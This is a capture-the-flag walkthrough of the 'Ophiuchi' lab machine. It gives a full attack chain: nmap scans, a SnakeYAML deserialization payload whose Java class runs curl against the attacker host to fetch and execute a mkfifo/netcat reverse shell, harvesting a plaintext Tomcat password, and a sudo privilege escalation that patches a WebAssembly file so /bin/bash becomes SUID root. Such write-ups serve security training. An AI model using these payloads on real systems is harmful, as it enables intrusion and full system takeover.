Ophiuchi

Enumeration

As always, we start with the enumeration phase, in which we try to scan the machine looking for open ports and finding out services and versions of those opened ports.

The following nmap command will scan the target machine looking for open ports in a fast way and saving the output into a file:

nmap -sS --min-rate 5000 -p- -T5 -Pn -n 10.10.10.227 -oN allPorts

-sS use the TCP SYN scan option. This scan option is relatively unobtrusive and stealthy, since it never completes TCP connections.
--min-rate 5000 nmap will try to keep the sending rate at or above 5000 packets per second.
-p- scanning the entire port range, from 1 to 65535.
-T5 insane mode, it is the fastest mode of the nmap time template.
-Pn assume the host is online.
-n scan without reverse DNS resolution.
-oN save the scan result into a file, in this case the allports file.

# Nmap 7.92 scan initiated Sun Jul  3 23:48:53 2022 as: nmap -sS -p- --min-rate 5000 -Pn -n -oN allPorts 10.10.10.227
Nmap scan report for 10.10.10.227
Host is up (0.056s latency).
Not shown: 65533 closed tcp ports (reset)
PORT     STATE SERVICE
22/tcp   open  ssh
8080/tcp open  http-proxy

# Nmap done at Sun Jul  3 23:49:08 2022 -- 1 IP address (1 host up) scanned in 14.71 seconds

Now that we know which ports are open, let's try to obtain the services and versions running on these ports. The following command will scan these ports more in depth and save the result into a file:

nmap -sC -sV -p80 10.10.10.227 -oN targeted

-sC performs the scan using the default set of scripts.
-sV enables version detection.
-oN save the scan result into file, in this case the targeted file.

# Nmap 7.92 scan initiated Sun Jul  3 23:49:41 2022 as: nmap -sCV -p22,8080 -oN targeted 10.10.10.227
Nmap scan report for 10.10.10.227
Host is up (0.046s latency).

PORT     STATE SERVICE VERSION
22/tcp   open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.1 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   3072 6d:fc:68:e2:da:5e:80:df:bc:d0:45:f5:29:db:04:ee (RSA)
|   256 7a:c9:83:7e:13:cb:c3:f9:59:1e:53:21:ab:19:76:ab (ECDSA)
|_  256 17:6b:c3:a8:fc:5d:36:08:a1:40:89:d2:f4:0a:c6:46 (ED25519)
8080/tcp open  http    Apache Tomcat 9.0.38
|_http-title: Parse YAML
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Sun Jul  3 23:49:51 2022 -- 1 IP address (1 host up) scanned in 10.52 seconds

Exploitation

If we take a look at the website on port 8080, we'll see a YAML Parser.

Doing some research, I found that there is a way to execute command with some YAML code. This GitHub repository explains how to do it. Let's clone it.

git clone https://github.com/artsploit/yaml-payload

The idea here is to make a file called reverse.sh, which will send us a reverse shell when it is executed. Then, make the server download that file, and then make it execute it. First let's make the reverse.sh file.

nano reverse.sh

rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.14.15 4444 >/tmp/f

Then, we'll have to modify the src/artsploit/AwesomeScriptEngineFactory.java file. The server will download the reverse.sh file, save it in the /tmp directory, give it execution permissions, and finally execute it.

package artsploit;

import javax.script.ScriptEngine;
import javax.script.ScriptEngineFactory;
import java.io.IOException;
import java.util.List;

public class AwesomeScriptEngineFactory implements ScriptEngineFactory {

    public AwesomeScriptEngineFactory() {
        try {
            Runtime.getRuntime().exec("curl http://10.10.14.15/reverse.sh -o /dev/shm/reverse.sh");
            Runtime.getRuntime().exec("chmod +x /dev/shm/reverse.sh");
            Runtime.getRuntime().exec("/dev/shm/reverse.sh");
        } catch (IOException e) {
            e.printStackTrace();
        }
    }

    @Override
    public String getEngineName() {
        return null;
    }

    @Override
    public String getEngineVersion() {
        return null;
    }

    @Override
    public List<String> getExtensions() {
        return null;
    }

    @Override
    public List<String> getMimeTypes() {
        return null;
    }

    @Override
    public List<String> getNames() {
        return null;
    }

    @Override
    public String getLanguageName() {
        return null;
    }

    @Override
    public String getLanguageVersion() {
        return null;
    }

    @Override
    public Object getParameter(String key) {
        return null;
    }

    @Override
    public String getMethodCallSyntax(String obj, String m, String... args) {
        return null;
    }

    @Override
    public String getOutputStatement(String toDisplay) {
        return null;
    }

    @Override
    public String getProgram(String... statements) {
        return null;
    }

    @Override
    public ScriptEngine getScriptEngine() {
        return null;
    }
}

Now, we'll have to compile it.

javac src/artsploit/AwesomeScriptEngineFactory.java
jar -cvf yaml-payload.jar -C src/ .

Now, let's set a simple HTTP server where the reverse.sh and the src/ directory are.

python -m http.server 80

And a netcat listener on port 4444.

nc -lvnp 4444

-l listen mode.
-v verbose mode.
-n numeric-only IP, no DNS resolution.
-p specify the port to listen on.

Finally, if we submit the following YAML code through the website, we should get a reverse shell as the www-data user. Maybe you'll have to submit the code twice to make it work.

!!javax.script.ScriptEngineManager [
  !!java.net.URLClassLoader [[
    !!java.net.URL ["http://10.10.14.15/yaml-payload.jar"]
  ]]
]

listening on [any] 4444 ...
connect to [10.10.14.15] from (UNKNOWN) [10.10.10.227] 52796
/bin/sh: 0: can't access tty; job control turned off
$ whoami
tomcat

Privilege Escalation

First, let's set an interactive TTY shell.

script /dev/null -c /bin/bash

Then I press Ctrl+Z and execute the following command on my local machine:

stty raw -echo; fg
reset
Terminal type? xterm

Next, I export a few variables:

export TERM=xterm
export SHELL=bash

Finally, I run the following command in our local machine:

stty size

51 236

And set the proper dimensions in the victim machine:

stty rows 51 columns 236

Let's see the system users.

grep sh /etc/passwd

root:x:0:0:root:/root:/bin/bash
sshd:x:111:65534::/run/sshd:/usr/sbin/nologin
admin:x:1000:1000:,,,:/home/admin:/bin/bash

As we saw in the nmap report, there is a Tomcat server running on the machine. We could try to find the tomcat-users.xml file.

find / -name tomcat-users.xml 2>/dev/null

/opt/tomcat/conf/tomcat-users.xml

If we see it's content, we'll see some credentials for the admin user.

cat /opt/tomcat/conf/tomcat-users.xml

<?xml version="1.0" encoding="UTF-8"?>
<!--
  Licensed to the Apache Software Foundation (ASF) under one or more
  contributor license agreements.  See the NOTICE file distributed with
  this work for additional information regarding copyright ownership.
  The ASF licenses this file to You under the Apache License, Version 2.0
  (the "License"); you may not use this file except in compliance with
  the License.  You may obtain a copy of the License at

      http://www.apache.org/licenses/LICENSE-2.0

  Unless required by applicable law or agreed to in writing, software
  distributed under the License is distributed on an "AS IS" BASIS,
  WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
  See the License for the specific language governing permissions and
  limitations under the License.
-->
<tomcat-users xmlns="http://tomcat.apache.org/xml"
              xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
              xsi:schemaLocation="http://tomcat.apache.org/xml tomcat-users.xsd"
        version="1.0">
<user username="admin" password="whythereisalimit" roles="manager-gui,admin-gui"/>
<!--
  NOTE:  By default, no user is included in the "manager-gui" role required
  to operate the "/manager/html" web application.  If you wish to use this app,
  you must define such a user - the username and password are arbitrary. It is
  strongly recommended that you do NOT use one of the users in the commented out
  section below since they are intended for use with the examples web
  application.
-->
<!--
  NOTE:  The sample user and role entries below are intended for use with the
  examples web application. They are wrapped in a comment and thus are ignored
  when reading this file. If you wish to configure these users for use with the
  examples web application, do not forget to remove the <!.. ..> that surrounds
  them. You will also need to set the passwords to something appropriate.
-->
<!--
  <role rolename="tomcat"/>
  <role rolename="role1"/>
  <user username="tomcat" password="<must-be-changed>" roles="tomcat"/>
  <user username="both" password="<must-be-changed>" roles="tomcat,role1"/>
  <user username="role1" password="<must-be-changed>" roles="role1"/>
-->
</tomcat-users>

Let's try to become the admin user with the whythereisalimit password. Then, we'll be able to grab the user flag.

su admin

Password: whythereisalimit
admin@ophiuchi:/$ whoami
admin
admin@ophiuchi:/$ cat /home/admin/user.txt 
505fba479878a280e123e7bdbe94c902

If we check for sudo privileges, we'll see that we can execute a go script as the root user.

sudo -l

Matching Defaults entries for admin on ophiuchi:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User admin may run the following commands on ophiuchi:
    (ALL) NOPASSWD: /usr/bin/go run /opt/wasm-functions/index.go

If we execute it, we'll get a bunch of errors.

sudo /usr/bin/go run /opt/wasm-functions/index.go

panic: runtime error: index out of range [0] with length 0

goroutine 1 [running]:
github.com/wasmerio/wasmer-go/wasmer.NewInstanceWithImports.func1(0x0, 0x0, 0xc000040c90, 0x5d1200, 0x200000003)
        /root/go/src/github.com/wasmerio/wasmer-go/wasmer/instance.go:94 +0x201
github.com/wasmerio/wasmer-go/wasmer.newInstanceWithImports(0xc00008c020, 0xc000040d48, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0xc000040d70)
        /root/go/src/github.com/wasmerio/wasmer-go/wasmer/instance.go:137 +0x1d3
github.com/wasmerio/wasmer-go/wasmer.NewInstanceWithImports(0x0, 0x0, 0x0, 0xc00008c020, 0x0, 0x0, 0x0, 0x0, 0x0, 0x4e6180, ...)
        /root/go/src/github.com/wasmerio/wasmer-go/wasmer/instance.go:87 +0xa6
github.com/wasmerio/wasmer-go/wasmer.NewInstance(0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x4e6180, 0x1)
        /root/go/src/github.com/wasmerio/wasmer-go/wasmer/instance.go:82 +0xc9
main.main()
        /opt/wasm-functions/index.go:14 +0x6d
exit status 2

Let's take a look at it.

cat /opt/wasm-functions/index.go

package main

import (
        "fmt"
        wasm "github.com/wasmerio/wasmer-go/wasmer"
        "os/exec"
        "log"
)


func main() {
        bytes, _ := wasm.ReadBytes("main.wasm")

        instance, _ := wasm.NewInstance(bytes)
        defer instance.Close()
        init := instance.Exports["info"]
        result,_ := init()
        f := result.String()
        if (f != "1") {
                fmt.Println("Not ready to deploy")
        } else {
                fmt.Println("Ready to deploy")
                out, err := exec.Command("/bin/sh", "deploy.sh").Output()
                if err != nil {
                        log.Fatal(err)
                }
                fmt.Println(string(out))
        }
}

The file is trying to read a main.wasm file. Let's find it.

find / -name main.wasm 2>/dev/null

/opt/wasm-functions/main.wasm
/opt/wasm-functions/backup/main.wasm

If we go to the /opt/wasm-functions/ directory and execute the script again, we won't see any errors because now the script can find the main.wasm file in the current directory.

cd /opt/wasm-functions/
sudo /usr/bin/go run /opt/wasm-functions/index.go

Not ready to deploy

Let's understand a bit the functionality of the script. Basically, it is reading the content of the main.wasm file, which is a binary, so it is not readable. Then, it is checking if the f variable is equal to 1. If it is equal to 1, then it will execute a file called deploy.sh, if not, it will show the message Not ready to deploy. The idea is to modify the main.wasm file so the f variable is equal to 1, and then it will execute a file called deploy.sh made by us, which will give the /bin/bash the SUID permission. Let's go to the /tmp directory, and make that file.

nano /tmp/deploy.sh
chmod +x /tmp/deploy.sh

#!/bin/bash
chmod u+s /bin/bash

Now, let's transfer the main.wasm file to our local machine.

python3 -m http.server 8081

On our local machine.

wget http://10.10.10.227:8081/main.wasm

Now, we'll have to convert the .wasm file to a .wat file, so it is readable. We can do it with the following GitHub repository.

git clone https://github.com/WebAssembly/wabt
cd wabt
git submodule update --init

Now, let's compile it.

mkdir build
cd build
cmake ..
cmake --build .

Now, let's convert the main.wasm file to main.wat file.

./wasm2wat main.wasm > main.wat
cat main.wat

(module
  (type (;0;) (func (result i32)))
  (func $info (type 0) (result i32)
    i32.const 0)
  (table (;0;) 1 1 funcref)
  (memory (;0;) 16)
  (global (;0;) (mut i32) (i32.const 1048576))
  (global (;1;) i32 (i32.const 1048576))
  (global (;2;) i32 (i32.const 1048576))
  (export "memory" (memory 0))
  (export "info" (func $info))
  (export "__data_end" (global 1))
  (export "__heap_base" (global 2)))

There is a constant which is equal to 0, maybe if we change it to 1 the f variable will be equal to 1, and the deploy.sh script will be executed. Let's change the main.wat file.

nano main.wat

(module
  (type (;0;) (func (result i32)))
  (func $info (type 0) (result i32)
    i32.const 1)
  (table (;0;) 1 1 funcref)
  (memory (;0;) 16)
  (global (;0;) (mut i32) (i32.const 1048576))
  (global (;1;) i32 (i32.const 1048576))
  (global (;2;) i32 (i32.const 1048576))
  (export "memory" (memory 0))
  (export "info" (func $info))
  (export "__data_end" (global 1))
  (export "__heap_base" (global 2)))

Now, we'll have to convert the .wat file to .wasm.

rm main.wasm
./wat2wasm main.wat > main.wasm

And transfer it to the victim machine. Let's set a simple HTTP server with python.

python -m http.server 80

And download it from the /tmp directory of the victim machine.

cd /tmp
wget http://10.10.14.15/main.wasm

If now we execute the script, we'll see the Ready to deploy message.

sudo /usr/bin/go run /opt/wasm-functions/index.go

Ready to deploy

Now, the /bin/bash binary hash SUID privileges.

ls -l /bin/bash

-rwsr-xr-x 1 root root 1183448 Feb 25  2020 /bin/bash

And finally, all we have to do is execute the bash binary with root permissions, and reap the harvest and take the root flag.

bash -p

bash-5.0# whoami
root
bash-5.0# cat /root/root.txt 
479eea917b6888cf319d635e702dde6d

Last updated 2 years ago

Was this helpful?